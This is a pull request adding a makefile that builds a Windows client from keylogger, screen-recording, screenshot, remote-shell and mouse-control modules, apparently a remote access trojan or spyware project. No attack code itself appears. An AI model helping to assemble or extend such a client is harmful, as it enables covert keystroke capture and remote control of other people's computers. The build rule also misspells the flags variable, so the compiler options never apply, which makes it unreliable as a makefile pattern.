### PR TITLE
Add makefile for client build process

### DIFF
--- a/client/makefile
+++ b/client/makefile
@@ -1,0 +1,20 @@
+CXX = g++
+CXXFLAGS := -std=c++17 -Wall -O2 -I. -MMD -MP
+
+LDLIBS = -lws2_32 -lgdiplus -lgdi32 -lole32
+
+SRCS = client.cpp \
+        modules/codes/module.cpp \
+        modules/codes/ss_module.cpp \
+        modules/codes/keylogger_module.cpp \
+        modules/codes/screen_recording_module.cpp \
+        modules/codes/remote_shell_module.cpp \
+        modules/codes/mouse_control.cpp
+
+TARGET = client.exe
+
+all:
+	$(CXX) $(CXXfLAGS) $(SRCS) -o $(TARGET) $(LDLIBS)
+
+clean:
+	rm -f $(TARGET)


### PR DESCRIPTION
Introduces a makefile to build the client executable with specified source files and libraries. Includes targets for building and cleaning the client binary.

Might have some problems because of mouse_control module. The module itself is not implemented fully I guess.